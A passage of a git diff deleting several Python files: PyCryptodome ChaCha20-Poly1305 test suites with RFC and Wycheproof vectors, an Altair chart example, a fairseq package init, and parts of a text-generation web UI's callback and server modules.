nonce=self.nonce_96) - self.assertRaises(TypeError, cipher.decrypt, u'test1234567890-*') - - def test_mac_len(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - _, mac = 
cipher.encrypt_and_digest(self.data_128) - self.assertEqual(len(mac), 16) - - def test_invalid_mac(self): - from Crypto.Util.strxor import strxor_c - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - ct, mac = cipher.encrypt_and_digest(self.data_128) - - invalid_mac = strxor_c(mac, 0x01) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertRaises(ValueError, cipher.decrypt_and_verify, ct, - invalid_mac) - - def test_hex_mac(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - mac_hex = cipher.hexdigest() - self.assertEqual(cipher.digest(), unhexlify(mac_hex)) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.hexverify(mac_hex) - - def test_message_chunks(self): - # Validate that both associated data and plaintext/ciphertext - # can be broken up in chunks of arbitrary length - - auth_data = get_tag_random("authenticated data", 127) - plaintext = get_tag_random("plaintext", 127) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(auth_data) - ciphertext, ref_mac = cipher.encrypt_and_digest(plaintext) - - def break_up(data, chunk_length): - return [data[i:i+chunk_length] for i in range(0, len(data), - chunk_length)] - - # Encryption - for chunk_length in 1, 2, 3, 7, 10, 13, 16, 40, 80, 128: - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - - for chunk in break_up(auth_data, chunk_length): - cipher.update(chunk) - pt2 = b"" - for chunk in break_up(ciphertext, chunk_length): - pt2 += cipher.decrypt(chunk) - self.assertEqual(plaintext, pt2) - cipher.verify(ref_mac) - - # Decryption - for chunk_length in 1, 2, 3, 7, 10, 13, 16, 40, 80, 128: - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - - for chunk in break_up(auth_data, chunk_length): - cipher.update(chunk) - ct2 = b"" - for chunk in break_up(plaintext, chunk_length): - ct2 += cipher.encrypt(chunk) - 
self.assertEqual(ciphertext, ct2) - self.assertEqual(cipher.digest(), ref_mac) - - def test_bytearray(self): - - # Encrypt - key_ba = bytearray(self.key_256) - nonce_ba = bytearray(self.nonce_96) - header_ba = bytearray(self.data_128) - data_ba = bytearray(self.data_128) - - cipher1 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher1.update(self.data_128) - ct = cipher1.encrypt(self.data_128) - tag = cipher1.digest() - - cipher2 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - key_ba[:3] = b'\xFF\xFF\xFF' - nonce_ba[:3] = b'\xFF\xFF\xFF' - cipher2.update(header_ba) - header_ba[:3] = b'\xFF\xFF\xFF' - ct_test = cipher2.encrypt(data_ba) - data_ba[:3] = b'\x99\x99\x99' - tag_test = cipher2.digest() - - self.assertEqual(ct, ct_test) - self.assertEqual(tag, tag_test) - self.assertEqual(cipher1.nonce, cipher2.nonce) - - # Decrypt - key_ba = bytearray(self.key_256) - nonce_ba = bytearray(self.nonce_96) - header_ba = bytearray(self.data_128) - ct_ba = bytearray(ct) - tag_ba = bytearray(tag) - del data_ba - - cipher3 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - key_ba[:3] = b'\xFF\xFF\xFF' - nonce_ba[:3] = b'\xFF\xFF\xFF' - cipher3.update(header_ba) - header_ba[:3] = b'\xFF\xFF\xFF' - pt_test = cipher3.decrypt(ct_ba) - ct_ba[:3] = b'\xFF\xFF\xFF' - cipher3.verify(tag_ba) - - self.assertEqual(pt_test, self.data_128) - - def test_memoryview(self): - - # Encrypt - key_mv = memoryview(bytearray(self.key_256)) - nonce_mv = memoryview(bytearray(self.nonce_96)) - header_mv = memoryview(bytearray(self.data_128)) - data_mv = memoryview(bytearray(self.data_128)) - - cipher1 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher1.update(self.data_128) - ct = cipher1.encrypt(self.data_128) - tag = cipher1.digest() - - cipher2 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - key_mv[:3] = b'\xFF\xFF\xFF' - nonce_mv[:3] = b'\xFF\xFF\xFF' - cipher2.update(header_mv) - header_mv[:3] = 
b'\xFF\xFF\xFF' - ct_test = cipher2.encrypt(data_mv) - data_mv[:3] = b'\x99\x99\x99' - tag_test = cipher2.digest() - - self.assertEqual(ct, ct_test) - self.assertEqual(tag, tag_test) - self.assertEqual(cipher1.nonce, cipher2.nonce) - - # Decrypt - key_mv = memoryview(bytearray(self.key_256)) - nonce_mv = memoryview(bytearray(self.nonce_96)) - header_mv = memoryview(bytearray(self.data_128)) - ct_mv = memoryview(bytearray(ct)) - tag_mv = memoryview(bytearray(tag)) - del data_mv - - cipher3 = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - key_mv[:3] = b'\xFF\xFF\xFF' - nonce_mv[:3] = b'\xFF\xFF\xFF' - cipher3.update(header_mv) - header_mv[:3] = b'\xFF\xFF\xFF' - pt_test = cipher3.decrypt(ct_mv) - ct_mv[:3] = b'\x99\x99\x99' - cipher3.verify(tag_mv) - - self.assertEqual(pt_test, self.data_128) - - -class XChaCha20Poly1305Tests(unittest.TestCase): - - def test_encrypt(self): - # From https://tools.ietf.org/html/draft-arciszewski-xchacha-03 - # Section A.3.1 - - pt = b""" - 4c616469657320616e642047656e746c656d656e206f662074686520636c6173 - 73206f66202739393a204966204920636f756c64206f6666657220796f75206f - 6e6c79206f6e652074697020666f7220746865206675747572652c2073756e73 - 637265656e20776f756c642062652069742e""" - pt = unhexlify(pt.replace(b"\n", b"").replace(b" ", b"")) - - aad = unhexlify(b"50515253c0c1c2c3c4c5c6c7") - key = unhexlify(b"808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9f") - iv = unhexlify(b"404142434445464748494a4b4c4d4e4f5051525354555657") - - ct = b""" - bd6d179d3e83d43b9576579493c0e939572a1700252bfaccbed2902c21396cbb - 731c7f1b0b4aa6440bf3a82f4eda7e39ae64c6708c54c216cb96b72e1213b452 - 2f8c9ba40db5d945b11b69b982c1bb9e3f3fac2bc369488f76b2383565d3fff9 - 21f9664c97637da9768812f615c68b13b52e""" - ct = unhexlify(ct.replace(b"\n", b"").replace(b" ", b"")) - - tag = unhexlify(b"c0875924c1c7987947deafd8780acf49") - - cipher = ChaCha20_Poly1305.new(key=key, nonce=iv) - cipher.update(aad) - ct_test, tag_test = 
cipher.encrypt_and_digest(pt) - - self.assertEqual(ct, ct_test) - self.assertEqual(tag, tag_test) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=iv) - cipher.update(aad) - cipher.decrypt_and_verify(ct, tag) - - -class ChaCha20Poly1305FSMTests(unittest.TestCase): - - key_256 = get_tag_random("key_256", 32) - nonce_96 = get_tag_random("nonce_96", 12) - data_128 = get_tag_random("data_128", 16) - - def test_valid_init_encrypt_decrypt_digest_verify(self): - # No authenticated data, fixed plaintext - # Verify path INIT->ENCRYPT->DIGEST - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - ct = cipher.encrypt(self.data_128) - mac = cipher.digest() - - # Verify path INIT->DECRYPT->VERIFY - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.decrypt(ct) - cipher.verify(mac) - - def test_valid_init_update_digest_verify(self): - # No plaintext, fixed authenticated data - # Verify path INIT->UPDATE->DIGEST - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - mac = cipher.digest() - - # Verify path INIT->UPDATE->VERIFY - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - cipher.verify(mac) - - def test_valid_full_path(self): - # Fixed authenticated data, fixed plaintext - # Verify path INIT->UPDATE->ENCRYPT->DIGEST - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - ct = cipher.encrypt(self.data_128) - mac = cipher.digest() - - # Verify path INIT->UPDATE->DECRYPT->VERIFY - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - cipher.decrypt(ct) - cipher.verify(mac) - - def test_valid_init_digest(self): - # Verify path INIT->DIGEST - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.digest() - - def test_valid_init_verify(self): - # Verify path INIT->VERIFY - cipher = 
ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - mac = cipher.digest() - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.verify(mac) - - def test_valid_multiple_encrypt_or_decrypt(self): - for method_name in "encrypt", "decrypt": - for auth_data in (None, b"333", self.data_128, - self.data_128 + b"3"): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - if auth_data is not None: - cipher.update(auth_data) - method = getattr(cipher, method_name) - method(self.data_128) - method(self.data_128) - method(self.data_128) - method(self.data_128) - - def test_valid_multiple_digest_or_verify(self): - # Multiple calls to digest - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - first_mac = cipher.digest() - for x in range(4): - self.assertEqual(first_mac, cipher.digest()) - - # Multiple calls to verify - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - for x in range(5): - cipher.verify(first_mac) - - def test_valid_encrypt_and_digest_decrypt_and_verify(self): - # encrypt_and_digest - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - ct, mac = cipher.encrypt_and_digest(self.data_128) - - # decrypt_and_verify - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.update(self.data_128) - pt = cipher.decrypt_and_verify(ct, mac) - self.assertEqual(self.data_128, pt) - - def test_invalid_mixing_encrypt_decrypt(self): - # Once per method, with or without assoc. 
data - for method1_name, method2_name in (("encrypt", "decrypt"), - ("decrypt", "encrypt")): - for assoc_data_present in (True, False): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - if assoc_data_present: - cipher.update(self.data_128) - getattr(cipher, method1_name)(self.data_128) - self.assertRaises(TypeError, getattr(cipher, method2_name), - self.data_128) - - def test_invalid_encrypt_or_update_after_digest(self): - for method_name in "encrypt", "update": - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.encrypt(self.data_128) - cipher.digest() - self.assertRaises(TypeError, getattr(cipher, method_name), - self.data_128) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.encrypt_and_digest(self.data_128) - - def test_invalid_decrypt_or_update_after_verify(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - ct = cipher.encrypt(self.data_128) - mac = cipher.digest() - - for method_name in "decrypt", "update": - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.decrypt(ct) - cipher.verify(mac) - self.assertRaises(TypeError, getattr(cipher, method_name), - self.data_128) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.decrypt(ct) - cipher.verify(mac) - self.assertRaises(TypeError, getattr(cipher, method_name), - self.data_128) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.decrypt_and_verify(ct, mac) - self.assertRaises(TypeError, getattr(cipher, method_name), - self.data_128) - - -def compact(x): - return unhexlify(x.replace(" ", "").replace(":", "")) - - -class TestVectorsRFC(unittest.TestCase): - """Test cases from RFC7539""" - - # AAD, PT, CT, MAC, KEY, NONCE - test_vectors_hex = [ - ( '50 51 52 53 c0 c1 c2 c3 c4 c5 c6 c7', - '4c 61 64 69 65 73 20 61 6e 64 20 47 65 6e 74 6c' - '65 6d 65 6e 20 6f 66 20 74 68 65 20 63 6c 61 73' - '73 
20 6f 66 20 27 39 39 3a 20 49 66 20 49 20 63' - '6f 75 6c 64 20 6f 66 66 65 72 20 79 6f 75 20 6f' - '6e 6c 79 20 6f 6e 65 20 74 69 70 20 66 6f 72 20' - '74 68 65 20 66 75 74 75 72 65 2c 20 73 75 6e 73' - '63 72 65 65 6e 20 77 6f 75 6c 64 20 62 65 20 69' - '74 2e', - 'd3 1a 8d 34 64 8e 60 db 7b 86 af bc 53 ef 7e c2' - 'a4 ad ed 51 29 6e 08 fe a9 e2 b5 a7 36 ee 62 d6' - '3d be a4 5e 8c a9 67 12 82 fa fb 69 da 92 72 8b' - '1a 71 de 0a 9e 06 0b 29 05 d6 a5 b6 7e cd 3b 36' - '92 dd bd 7f 2d 77 8b 8c 98 03 ae e3 28 09 1b 58' - 'fa b3 24 e4 fa d6 75 94 55 85 80 8b 48 31 d7 bc' - '3f f4 de f0 8e 4b 7a 9d e5 76 d2 65 86 ce c6 4b' - '61 16', - '1a:e1:0b:59:4f:09:e2:6a:7e:90:2e:cb:d0:60:06:91', - '80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f' - '90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f', - '07 00 00 00' + '40 41 42 43 44 45 46 47', - ), - ( 'f3 33 88 86 00 00 00 00 00 00 4e 91', - '49 6e 74 65 72 6e 65 74 2d 44 72 61 66 74 73 20' - '61 72 65 20 64 72 61 66 74 20 64 6f 63 75 6d 65' - '6e 74 73 20 76 61 6c 69 64 20 66 6f 72 20 61 20' - '6d 61 78 69 6d 75 6d 20 6f 66 20 73 69 78 20 6d' - '6f 6e 74 68 73 20 61 6e 64 20 6d 61 79 20 62 65' - '20 75 70 64 61 74 65 64 2c 20 72 65 70 6c 61 63' - '65 64 2c 20 6f 72 20 6f 62 73 6f 6c 65 74 65 64' - '20 62 79 20 6f 74 68 65 72 20 64 6f 63 75 6d 65' - '6e 74 73 20 61 74 20 61 6e 79 20 74 69 6d 65 2e' - '20 49 74 20 69 73 20 69 6e 61 70 70 72 6f 70 72' - '69 61 74 65 20 74 6f 20 75 73 65 20 49 6e 74 65' - '72 6e 65 74 2d 44 72 61 66 74 73 20 61 73 20 72' - '65 66 65 72 65 6e 63 65 20 6d 61 74 65 72 69 61' - '6c 20 6f 72 20 74 6f 20 63 69 74 65 20 74 68 65' - '6d 20 6f 74 68 65 72 20 74 68 61 6e 20 61 73 20' - '2f e2 80 9c 77 6f 72 6b 20 69 6e 20 70 72 6f 67' - '72 65 73 73 2e 2f e2 80 9d', - '64 a0 86 15 75 86 1a f4 60 f0 62 c7 9b e6 43 bd' - '5e 80 5c fd 34 5c f3 89 f1 08 67 0a c7 6c 8c b2' - '4c 6c fc 18 75 5d 43 ee a0 9e e9 4e 38 2d 26 b0' - 'bd b7 b7 3c 32 1b 01 00 d4 f0 3b 7f 35 58 94 cf' - '33 2f 83 0e 71 0b 97 ce 98 c8 a8 
4a bd 0b 94 81' - '14 ad 17 6e 00 8d 33 bd 60 f9 82 b1 ff 37 c8 55' - '97 97 a0 6e f4 f0 ef 61 c1 86 32 4e 2b 35 06 38' - '36 06 90 7b 6a 7c 02 b0 f9 f6 15 7b 53 c8 67 e4' - 'b9 16 6c 76 7b 80 4d 46 a5 9b 52 16 cd e7 a4 e9' - '90 40 c5 a4 04 33 22 5e e2 82 a1 b0 a0 6c 52 3e' - 'af 45 34 d7 f8 3f a1 15 5b 00 47 71 8c bc 54 6a' - '0d 07 2b 04 b3 56 4e ea 1b 42 22 73 f5 48 27 1a' - '0b b2 31 60 53 fa 76 99 19 55 eb d6 31 59 43 4e' - 'ce bb 4e 46 6d ae 5a 10 73 a6 72 76 27 09 7a 10' - '49 e6 17 d9 1d 36 10 94 fa 68 f0 ff 77 98 71 30' - '30 5b ea ba 2e da 04 df 99 7b 71 4d 6c 6f 2c 29' - 'a6 ad 5c b4 02 2b 02 70 9b', - 'ee ad 9d 67 89 0c bb 22 39 23 36 fe a1 85 1f 38', - '1c 92 40 a5 eb 55 d3 8a f3 33 88 86 04 f6 b5 f0' - '47 39 17 c1 40 2b 80 09 9d ca 5c bc 20 70 75 c0', - '00 00 00 00 01 02 03 04 05 06 07 08', - ) - ] - - test_vectors = [[unhexlify(x.replace(" ","").replace(":","")) for x in tv] for tv in test_vectors_hex] - - def runTest(self): - for assoc_data, pt, ct, mac, key, nonce in self.test_vectors: - # Encrypt - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - cipher.update(assoc_data) - ct2, mac2 = cipher.encrypt_and_digest(pt) - self.assertEqual(ct, ct2) - self.assertEqual(mac, mac2) - - # Decrypt - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - cipher.update(assoc_data) - pt2 = cipher.decrypt_and_verify(ct, mac) - self.assertEqual(pt, pt2) - - -class TestVectorsWycheproof(unittest.TestCase): - - def __init__(self, wycheproof_warnings): - unittest.TestCase.__init__(self) - self._wycheproof_warnings = wycheproof_warnings - self._id = "None" - - def load_tests(self, filename): - - def filter_tag(group): - return group['tagSize'] // 8 - - def filter_algo(root): - return root['algorithm'] - - result = load_test_vectors_wycheproof(("Cipher", "wycheproof"), - filename, - "Wycheproof ChaCha20-Poly1305", - root_tag={'algo': filter_algo}, - group_tag={'tag_size': filter_tag}) - return result - - def setUp(self): - self.tv = [] - 
self.tv.extend(self.load_tests("chacha20_poly1305_test.json")) - self.tv.extend(self.load_tests("xchacha20_poly1305_test.json")) - - def shortDescription(self): - return self._id - - def warn(self, tv): - if tv.warning and self._wycheproof_warnings: - import warnings - warnings.warn("Wycheproof warning: %s (%s)" % (self._id, tv.comment)) - - def test_encrypt(self, tv): - self._id = "Wycheproof Encrypt %s Test #%s" % (tv.algo, tv.id) - - try: - cipher = ChaCha20_Poly1305.new(key=tv.key, nonce=tv.iv) - except ValueError as e: - assert len(tv.iv) not in (8, 12) and "Nonce must be" in str(e) - return - - cipher.update(tv.aad) - ct, tag = cipher.encrypt_and_digest(tv.msg) - if tv.valid: - self.assertEqual(ct, tv.ct) - self.assertEqual(tag, tv.tag) - self.warn(tv) - - def test_decrypt(self, tv): - self._id = "Wycheproof Decrypt %s Test #%s" % (tv.algo, tv.id) - - try: - cipher = ChaCha20_Poly1305.new(key=tv.key, nonce=tv.iv) - except ValueError as e: - assert len(tv.iv) not in (8, 12) and "Nonce must be" in str(e) - return - - cipher.update(tv.aad) - try: - pt = cipher.decrypt_and_verify(tv.ct, tv.tag) - except ValueError: - assert not tv.valid - else: - assert tv.valid - self.assertEqual(pt, tv.msg) - self.warn(tv) - - def test_corrupt_decrypt(self, tv): - self._id = "Wycheproof Corrupt Decrypt ChaCha20-Poly1305 Test #" + str(tv.id) - if len(tv.iv) == 0 or len(tv.ct) < 1: - return - cipher = ChaCha20_Poly1305.new(key=tv.key, nonce=tv.iv) - cipher.update(tv.aad) - ct_corrupt = strxor(tv.ct, b"\x00" * (len(tv.ct) - 1) + b"\x01") - self.assertRaises(ValueError, cipher.decrypt_and_verify, ct_corrupt, tv.tag) - - def runTest(self): - - for tv in self.tv: - self.test_encrypt(tv) - self.test_decrypt(tv) - self.test_corrupt_decrypt(tv) - - -class TestOutput(unittest.TestCase): - - def runTest(self): - # Encrypt/Decrypt data and test output parameter - - key = b'4' * 32 - nonce = b'5' * 12 - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - - pt = b'5' * 16 - ct = 
cipher.encrypt(pt) - - output = bytearray(16) - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - res = cipher.encrypt(pt, output=output) - self.assertEqual(ct, output) - self.assertEqual(res, None) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - res = cipher.decrypt(ct, output=output) - self.assertEqual(pt, output) - self.assertEqual(res, None) - - output = memoryview(bytearray(16)) - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - cipher.encrypt(pt, output=output) - self.assertEqual(ct, output) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - cipher.decrypt(ct, output=output) - self.assertEqual(pt, output) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - self.assertRaises(TypeError, cipher.encrypt, pt, output=b'0'*16) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - self.assertRaises(TypeError, cipher.decrypt, ct, output=b'0'*16) - - shorter_output = bytearray(7) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - self.assertRaises(ValueError, cipher.encrypt, pt, output=shorter_output) - - cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) - self.assertRaises(ValueError, cipher.decrypt, ct, output=shorter_output) - - -def get_tests(config={}): - wycheproof_warnings = config.get('wycheproof_warnings') - - tests = [] - tests += list_test_cases(ChaCha20Poly1305Tests) - tests += list_test_cases(XChaCha20Poly1305Tests) - tests += list_test_cases(ChaCha20Poly1305FSMTests) - tests += [TestVectorsRFC()] - tests += [TestVectorsWycheproof(wycheproof_warnings)] - tests += [TestOutput()] - return tests - - -if __name__ == '__main__': - def suite(): - return unittest.TestSuite(get_tests()) - unittest.main(defaultTest='suite') diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/examples/grouped_bar_chart_with_error_bars.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/examples/grouped_bar_chart_with_error_bars.py deleted file mode 100644 index 
c1eab965d7ec6a97360642d779589dd1882f3991..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/examples/grouped_bar_chart_with_error_bars.py +++ /dev/null @@ -1,25 +0,0 @@ -""" -Grouped Bar Chart with Error Bars ---------------------------------- -This example shows a grouped bar chart with error bars. -""" -# category: bar charts -import altair as alt -from vega_datasets import data - -source = data.barley() - -bars = alt.Chart().mark_bar().encode( - x='year:O', - y=alt.Y('mean(yield):Q', title='Mean Yield'), - color='year:N', -) - -error_bars = alt.Chart().mark_errorbar(extent='ci').encode( - x='year:O', - y='yield:Q' -) - -alt.layer(bars, error_bars, data=source).facet( - column='site:N' -) diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/data/legacy/__init__.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/data/legacy/__init__.py deleted file mode 100644 index 9bd5c72b5e9d7f67fb7e4ef10808d7ec08967ff4..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/data/legacy/__init__.py +++ /dev/null @@ -1,16 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
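The Altair example above encodes `mean(yield)` per (year, site) group in the bar layer; as a plain-Python illustration of that group-mean aggregation (stdlib only; the sample records are made up, standing in for the barley dataset):

```python
from collections import defaultdict
from statistics import mean

# Hypothetical (year, site, yield) records standing in for data.barley().
records = [
    (1931, "Crookston", 43.0), (1931, "Crookston", 47.2),
    (1932, "Crookston", 39.9), (1932, "Crookston", 34.4),
]

# Group yields by (year, site), mirroring the x/color/facet encodings.
groups = defaultdict(list)
for year, site, y in records:
    groups[(year, site)].append(y)

# mean(yield) per group -- the quantity the bar layer encodes; the error-bar
# layer would additionally bootstrap a confidence interval (extent='ci').
means = {k: mean(v) for k, v in groups.items()}
print(means[(1931, "Crookston")])  # → 45.1
```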
- -from .block_pair_dataset import BlockPairDataset -from .masked_lm_dataset import MaskedLMDataset -from .masked_lm_dictionary import BertDictionary, MaskedLMDictionary - - -__all__ = [ - "BertDictionary", - "BlockPairDataset", - "MaskedLMDataset", - "MaskedLMDictionary", -] diff --git a/spaces/ashercn97/AsherTesting/modules/callbacks.py b/spaces/ashercn97/AsherTesting/modules/callbacks.py deleted file mode 100644 index 1fa95e475f5e7f5936f55c6dc2848770621a1241..0000000000000000000000000000000000000000 --- a/spaces/ashercn97/AsherTesting/modules/callbacks.py +++ /dev/null @@ -1,94 +0,0 @@ -import gc -import traceback -from queue import Queue -from threading import Thread - -import torch -import transformers - -import modules.shared as shared - - -class _StopEverythingStoppingCriteria(transformers.StoppingCriteria): - def __init__(self): - transformers.StoppingCriteria.__init__(self) - - def __call__(self, input_ids: torch.LongTensor, _scores: torch.FloatTensor) -> bool: - return shared.stop_everything - - -class Stream(transformers.StoppingCriteria): - def __init__(self, callback_func=None): - self.callback_func = callback_func - - def __call__(self, input_ids, scores) -> bool: - if self.callback_func is not None: - self.callback_func(input_ids[0]) - return False - - -class Iteratorize: - - """ - Transforms a function that takes a callback - into a lazy iterator (generator). 
- - Adapted from: https://stackoverflow.com/a/9969000 - """ - - def __init__(self, func, args=None, kwargs=None, callback=None): - self.mfunc = func - self.c_callback = callback - self.q = Queue() - self.sentinel = object() - self.args = args or [] - self.kwargs = kwargs or {} - self.stop_now = False - - def _callback(val): - if self.stop_now or shared.stop_everything: - raise ValueError - self.q.put(val) - - def gentask(): - ret = None - try: - ret = self.mfunc(callback=_callback, *self.args, **self.kwargs) - except ValueError: - pass - except: - traceback.print_exc() - pass - - clear_torch_cache() - self.q.put(self.sentinel) - if self.c_callback: - self.c_callback(ret) - - self.thread = Thread(target=gentask) - self.thread.start() - - def __iter__(self): - return self - - def __next__(self): - obj = self.q.get(True, None) - if obj is self.sentinel: - raise StopIteration - else: - return obj - - def __del__(self): - clear_torch_cache() - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_val, exc_tb): - self.stop_now = True - clear_torch_cache() - - -def clear_torch_cache(): - gc.collect() - if not shared.args.cpu: - torch.cuda.empty_cache() diff --git a/spaces/ashercn97/AsherTesting/server.py b/spaces/ashercn97/AsherTesting/server.py deleted file mode 100644 index babdec2dcd9e59b4316ce0ba9d4879e5d6a4a531..0000000000000000000000000000000000000000 --- a/spaces/ashercn97/AsherTesting/server.py +++ /dev/null @@ -1,1181 +0,0 @@ -import os -import warnings - -from modules.logging_colors import logger -from modules.block_requests import OpenMonkeyPatch, RequestBlocker - -os.environ['GRADIO_ANALYTICS_ENABLED'] = 'False' -os.environ['BITSANDBYTES_NOWELCOME'] = '1' -warnings.filterwarnings('ignore', category=UserWarning, message='TypedStorage is deprecated') - -with RequestBlocker(): - import gradio as gr - -import matplotlib -matplotlib.use('Agg') # This fixes LaTeX rendering on some systems - -import importlib -import json -import math -import os -import re -import 
sys -import time -import traceback -from functools import partial -from pathlib import Path -from threading import Lock - -import psutil -import torch -import yaml -from PIL import Image - -import modules.extensions as extensions_module -from modules import chat, loaders, presets, shared, training, ui, utils -from modules.extensions import apply_extensions -from modules.github import clone_or_pull_repository -from modules.html_generator import chat_html_wrapper -from modules.LoRA import add_lora_to_model -from modules.models import load_model, unload_model -from modules.models_settings import ( - apply_model_settings_to_state, - get_model_settings_from_yamls, - save_model_settings, - update_model_parameters -) -from modules.text_generation import ( - generate_reply_wrapper, - get_encoded_length, - stop_everything_event -) -from modules.utils import gradio - - -def load_model_wrapper(selected_model, loader, autoload=False): - if not autoload: - yield f"The settings for {selected_model} have been updated.\nClick on \"Load\" to load it." - return - - if selected_model == 'None': - yield "No model selected" - else: - try: - yield f"Loading {selected_model}..." - shared.model_name = selected_model - unload_model() - if selected_model != '': - shared.model, shared.tokenizer = load_model(shared.model_name, loader) - - if shared.model is not None: - yield f"Successfully loaded {selected_model}" - else: - yield f"Failed to load {selected_model}." 
- except: - exc = traceback.format_exc() - logger.error('Failed to load the model.') - print(exc) - yield exc - - -def load_lora_wrapper(selected_loras): - yield ("Applying the following LoRAs to {}:\n\n{}".format(shared.model_name, '\n'.join(selected_loras))) - add_lora_to_model(selected_loras) - yield ("Successfully applied the LoRAs") - - -def load_prompt(fname): - if fname in ['None', '']: - return '' - elif fname.startswith('Instruct-'): - fname = re.sub('^Instruct-', '', fname) - file_path = Path(f'characters/instruction-following/{fname}.yaml') - if not file_path.exists(): - return '' - - with open(file_path, 'r', encoding='utf-8') as f: - data = yaml.safe_load(f) - output = '' - if 'context' in data: - output += data['context'] - - replacements = { - '<|user|>': data['user'], - '<|bot|>': data['bot'], - '<|user-message|>': 'Input', - } - - output += utils.replace_all(data['turn_template'].split('<|bot-message|>')[0], replacements) - return output.rstrip(' ') - else: - file_path = Path(f'prompts/{fname}.txt') - if not file_path.exists(): - return '' - - with open(file_path, 'r', encoding='utf-8') as f: - text = f.read() - if text[-1] == '\n': - text = text[:-1] - - return text - - -def count_tokens(text): - try: - tokens = get_encoded_length(text) - return f'{tokens} tokens in the input.' - except: - return 'Couldn\'t count the number of tokens. Is a tokenizer loaded?' 
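`load_model_wrapper` above (and `download_model_wrapper` below) stream progress to the Gradio UI by yielding status strings from a generator; a minimal self-contained sketch of that pattern (the `run_with_status` helper and `task` callable are hypothetical, not part of the original server code):

```python
import traceback


def run_with_status(task, name):
    """Yield human-readable progress messages while running `task`."""
    yield f"Loading {name}..."
    try:
        task()
    except Exception:
        # Surface the traceback to the caller instead of crashing the stream,
        # mirroring how the wrappers above yield the formatted exception.
        yield traceback.format_exc()
    else:
        yield f"Successfully loaded {name}"


messages = list(run_with_status(lambda: None, "demo-model"))
print(messages)  # → ['Loading demo-model...', 'Successfully loaded demo-model']
```

Gradio renders each yielded string as an updated status message, which is why these wrappers are generators rather than functions returning a single result.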
-
-
-def download_model_wrapper(repo_id, progress=gr.Progress()):
-    try:
-        downloader_module = importlib.import_module("download-model")
-        downloader = downloader_module.ModelDownloader()
-        repo_id_parts = repo_id.split(":")
-        model = repo_id_parts[0] if len(repo_id_parts) > 0 else repo_id
